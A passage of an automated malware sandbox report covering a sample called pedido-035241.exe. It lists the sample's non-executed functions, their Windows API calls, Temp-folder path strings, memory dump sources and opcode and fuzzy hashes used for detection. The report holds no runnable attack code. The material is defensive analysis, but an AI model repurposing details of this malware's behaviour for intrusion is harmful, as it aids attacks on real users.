                                                                                                                                                                            • Opcode ID: 2ab75a58c523acbc0361d9fc04dc8565c439a36a222869eb1b3daa153588a202
                                                                                                                                                                            • Instruction ID: 8c0427486d29053335645041865d96f0af5997519b71f4a23b4502285a2a7229
                                                                                                                                                                            • Opcode Fuzzy Hash: 2ab75a58c523acbc0361d9fc04dc8565c439a36a222869eb1b3daa153588a202
                                                                                                                                                                            • Instruction Fuzzy Hash: 4AF09072904012EBCB21ABA59994E9E72A4DF00318F25413BE102B21E1D77C4E528AAE

                                                                                                                                                                            Non-executed Functions

                                                                                                                                                                            Function 00404954 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 275stringCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetDlgItem.USER32(?,000003FB), ref: 004049A3
                                                                                                                                                                            • SetWindowTextW.USER32(00000000,?), ref: 004049CD
                                                                                                                                                                            • SHBrowseForFolderW.SHELL32(?), ref: 00404A7E
                                                                                                                                                                            • CoTaskMemFree.OLE32(00000000), ref: 00404A89
                                                                                                                                                                            • lstrcmpiW.KERNEL32(: Completed,00423708,00000000,?,?), ref: 00404ABB
                                                                                                                                                                            • lstrcatW.KERNEL32(?,: Completed), ref: 00404AC7
                                                                                                                                                                            • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404AD9
                                                                                                                                                                              • Part of subcall function 00405B4B: GetDlgItemTextW.USER32(?,?,00000400,00404B10), ref: 00405B5E
                                                                                                                                                                              • Part of subcall function 0040678E: CharNextW.USER32(?,*?|<>/":,00000000,00000000,74DF3420,C:\Users\user\AppData\Local\Temp\,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 004067F1
                                                                                                                                                                              • Part of subcall function 0040678E: CharNextW.USER32(?,?,?,00000000,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00406800
                                                                                                                                                                              • Part of subcall function 0040678E: CharNextW.USER32(?,00000000,74DF3420,C:\Users\user\AppData\Local\Temp\,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00406805
                                                                                                                                                                              • Part of subcall function 0040678E: CharPrevW.USER32(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00406818
                                                                                                                                                                            • GetDiskFreeSpaceW.KERNEL32(004216D8,?,?,0000040F,?,004216D8,004216D8,?,00000001,004216D8,?,?,000003FB,?), ref: 00404B9C
                                                                                                                                                                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404BB7
                                                                                                                                                                              • Part of subcall function 00404D10: lstrlenW.KERNEL32(00423708,00423708,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DB1
                                                                                                                                                                              • Part of subcall function 00404D10: wsprintfW.USER32 ref: 00404DBA
                                                                                                                                                                              • Part of subcall function 00404D10: SetDlgItemTextW.USER32(?,00423708), ref: 00404DCD
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                            • String ID: : Completed$A$C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner
                                                                                                                                                                            • API String ID: 2624150263-39638649
                                                                                                                                                                            • Opcode ID: 6bd2bc8b533fb15e6f7c23c87040bd2a6000733d02ac869fbd78df79038ba633
                                                                                                                                                                            • Instruction ID: 7ddb5d330cbe89f2e36b0747fff93e5a2dbc4858b94af439da1a7eccca155f6e
                                                                                                                                                                            • Opcode Fuzzy Hash: 6bd2bc8b533fb15e6f7c23c87040bd2a6000733d02ac869fbd78df79038ba633
                                                                                                                                                                            • Instruction Fuzzy Hash: 2EA18FB1900209ABDB119FA6CD45AAFB6B8EF84314F11803BF611B62D1D77C9A418B69
                                                                                                                                                                            Function 004021AA Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402229
                                                                                                                                                                            Strings
                                                                                                                                                                            • C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\Flyvevaabnene, xrefs: 00402269
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CreateInstance
                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\Flyvevaabnene
                                                                                                                                                                            • API String ID: 542301482-4197813180
                                                                                                                                                                            • Opcode ID: 70a4cfafb3696bf85ab74df719bf6584470e960af5f401986f4556537b1cbe4c
                                                                                                                                                                            • Instruction ID: 543bd56792285dd9977ebe6a5c934514532920c251de70bc34d4fa366edb348e
                                                                                                                                                                            • Opcode Fuzzy Hash: 70a4cfafb3696bf85ab74df719bf6584470e960af5f401986f4556537b1cbe4c
                                                                                                                                                                            • Instruction Fuzzy Hash: 80411771A00209EFCF40DFE4C989E9D7BB5BF49308B20456AF505EB2D1DB799941CB94
                                                                                                                                                                            Function 0040290B Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291A
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FileFindFirst
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1974802433-0
                                                                                                                                                                            • Opcode ID: 6e339d4586449b2e1fd81fccd2bd3fba9cabc785e87eab91eefa756a7dec7165
                                                                                                                                                                            • Instruction ID: 26775ad4c1080374fb75430f90045566014d5e2c4dab898babe53efe7e17598a
                                                                                                                                                                            • Opcode Fuzzy Hash: 6e339d4586449b2e1fd81fccd2bd3fba9cabc785e87eab91eefa756a7dec7165
                                                                                                                                                                            • Instruction Fuzzy Hash: F3F08271A04104EFD701DBA4DD49AAEB378FF14314F60417BE101F21D0E7B88E129B2A
                                                                                                                                                                            Function 00404ED0 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489windowmemoryCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetDlgItem.USER32(?,000003F9), ref: 00404EE8
                                                                                                                                                                            • GetDlgItem.USER32(?,00000408), ref: 00404EF3
                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 00404F3D
                                                                                                                                                                            • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404F54
                                                                                                                                                                            • SetWindowLongW.USER32(?,000000FC,004054DD), ref: 00404F6D
                                                                                                                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404F81
                                                                                                                                                                            • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404F93
                                                                                                                                                                            • SendMessageW.USER32(?,00001109,00000002), ref: 00404FA9
                                                                                                                                                                            • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404FB5
                                                                                                                                                                            • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404FC7
                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 00404FCA
                                                                                                                                                                            • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404FF5
                                                                                                                                                                            • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405001
                                                                                                                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 0040509C
                                                                                                                                                                            • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 004050CC
                                                                                                                                                                              • Part of subcall function 00404498: SendMessageW.USER32(00000028,?,00000001,004042C3), ref: 004044A6
                                                                                                                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 004050E0
                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 0040510E
                                                                                                                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040511C
                                                                                                                                                                            • ShowWindow.USER32(?,00000005), ref: 0040512C
                                                                                                                                                                            • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405227
                                                                                                                                                                            • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040528C
                                                                                                                                                                            • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052A1
                                                                                                                                                                            • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004052C5
                                                                                                                                                                            • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004052E5
                                                                                                                                                                            • ImageList_Destroy.COMCTL32(?), ref: 004052FA
                                                                                                                                                                            • GlobalFree.KERNEL32(?), ref: 0040530A
                                                                                                                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405383
                                                                                                                                                                            • SendMessageW.USER32(?,00001102,?,?), ref: 0040542C
                                                                                                                                                                            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040543B
                                                                                                                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00405466
                                                                                                                                                                            • ShowWindow.USER32(?,00000000), ref: 004054B4
                                                                                                                                                                            • GetDlgItem.USER32(?,000003FE), ref: 004054BF
                                                                                                                                                                            • ShowWindow.USER32(00000000), ref: 004054C6
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                            • String ID: $M$N
                                                                                                                                                                            • API String ID: 2564846305-813528018
                                                                                                                                                                            • Opcode ID: fcc7e91b83617d145af11aec22520696422ccde9284fa118c4a43dbc05db5981
                                                                                                                                                                            • Instruction ID: f25f8d73efcf6ba6a17deb726488d783a00b9a1a7703c2d4830b1b44d3514242
                                                                                                                                                                            • Opcode Fuzzy Hash: fcc7e91b83617d145af11aec22520696422ccde9284fa118c4a43dbc05db5981
                                                                                                                                                                            • Instruction Fuzzy Hash: 34027D70A00609EFDB20DF95CC45AAF7BB5FB84315F10817AE910BA2E1D7798A52CF58
                                                                                                                                                                            Function 00404622 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204windowstringCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004046C0
                                                                                                                                                                            • GetDlgItem.USER32(?,000003E8), ref: 004046D4
                                                                                                                                                                            • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004046F1
                                                                                                                                                                            • GetSysColor.USER32(?), ref: 00404702
                                                                                                                                                                            • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404710
                                                                                                                                                                            • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040471E
                                                                                                                                                                            • lstrlenW.KERNEL32(?), ref: 00404723
                                                                                                                                                                            • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404730
                                                                                                                                                                            • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404745
                                                                                                                                                                            • GetDlgItem.USER32(?,0000040A), ref: 0040479E
                                                                                                                                                                            • SendMessageW.USER32(00000000), ref: 004047A5
                                                                                                                                                                            • GetDlgItem.USER32(?,000003E8), ref: 004047D0
                                                                                                                                                                            • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404813
                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 00404821
                                                                                                                                                                            • SetCursor.USER32(00000000), ref: 00404824
                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 0040483D
                                                                                                                                                                            • SetCursor.USER32(00000000), ref: 00404840
                                                                                                                                                                            • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040486F
                                                                                                                                                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404881
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                                                                                            • String ID: : Completed$N
                                                                                                                                                                            • API String ID: 3103080414-2140067464
                                                                                                                                                                            • Opcode ID: 0388ebf4b552688962da2f0e60a0ed45a0ac6c6640f7b9ebe92ad344b143db63
                                                                                                                                                                            • Instruction ID: bd26b540472948519bfd0c296b0258925a36bd111cdc3ec084d9598cfd27fd02
                                                                                                                                                                            • Opcode Fuzzy Hash: 0388ebf4b552688962da2f0e60a0ed45a0ac6c6640f7b9ebe92ad344b143db63
                                                                                                                                                                            • Instruction Fuzzy Hash: A16180B1900209FFDB10AF61DD85AAA7B69FB84314F00853AFA05B62D1C7789D61CF99
                                                                                                                                                                            Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                            • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                            • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                                                            • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                                                            • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                                                                            • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                                                                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                                                            • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                                                            • DrawTextW.USER32(00000000,00429220,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                                                            • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                            • String ID: F
                                                                                                                                                                            • API String ID: 941294808-1304234792
                                                                                                                                                                            • Opcode ID: 0581a76dac59d14a304b59f1a22efed427390318551c262ebfc8c4fa99717288
                                                                                                                                                                            • Instruction ID: ce1ac2179a7edcd12a9bbec6f3b07c603adbad34dac6b1105353c89659c02e28
                                                                                                                                                                            • Opcode Fuzzy Hash: 0581a76dac59d14a304b59f1a22efed427390318551c262ebfc8c4fa99717288
                                                                                                                                                                            • Instruction Fuzzy Hash: 63417B71800209EFCF058FA5DE459AF7BB9FF45315F00802AF991AA2A0CB74DA55DFA4
                                                                                                                                                                            Function 0040614D Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004062E8,?,?), ref: 00406188
                                                                                                                                                                            • GetShortPathNameW.KERNEL32(?,00426DA8,00000400), ref: 00406191
                                                                                                                                                                              • Part of subcall function 00405F5C: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406241,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F6C
                                                                                                                                                                              • Part of subcall function 00405F5C: lstrlenA.KERNEL32(00000000,?,00000000,00406241,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F9E
                                                                                                                                                                            • GetShortPathNameW.KERNEL32(?,004275A8,00000400), ref: 004061AE
                                                                                                                                                                            • wsprintfA.USER32 ref: 004061CC
                                                                                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,004275A8,C0000000,00000004,004275A8,?,?,?,?,?), ref: 00406207
                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406216
                                                                                                                                                                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040624E
                                                                                                                                                                            • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,004269A8,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062A4
                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 004062B5
                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004062BC
                                                                                                                                                                              • Part of subcall function 00405FF7: GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\pedido-035241.exe,80000000,00000003,?,?,?,?,?,00403847,?), ref: 00405FFB
                                                                                                                                                                              • Part of subcall function 00405FF7: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,00403847,?), ref: 0040601D
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                                                                                            • String ID: %ls=%ls$[Rename]
                                                                                                                                                                            • API String ID: 2171350718-461813615
                                                                                                                                                                            • Opcode ID: dc4682ef79e092581efd41d4f88914fec7f2984e6363dc945e8c6098decd7ff7
                                                                                                                                                                            • Instruction ID: ee14a5085299e91e75cde0480e6b7733258fb9cdf367bc6c01a907801337673b
                                                                                                                                                                            • Opcode Fuzzy Hash: dc4682ef79e092581efd41d4f88914fec7f2984e6363dc945e8c6098decd7ff7
                                                                                                                                                                            • Instruction Fuzzy Hash: 03312130201715BFD2207B619D48F2B3AACEF41718F16007EBD42F62C2DE3C982586AD
                                                                                                                                                                            Function 004044CA Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetWindowLongW.USER32(?,000000EB), ref: 004044E7
                                                                                                                                                                            • GetSysColor.USER32(00000000), ref: 00404525
                                                                                                                                                                            • SetTextColor.GDI32(?,00000000), ref: 00404531
                                                                                                                                                                            • SetBkMode.GDI32(?,?), ref: 0040453D
                                                                                                                                                                            • GetSysColor.USER32(?), ref: 00404550
                                                                                                                                                                            • SetBkColor.GDI32(?,?), ref: 00404560
                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 0040457A
                                                                                                                                                                            • CreateBrushIndirect.GDI32(?), ref: 00404584
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
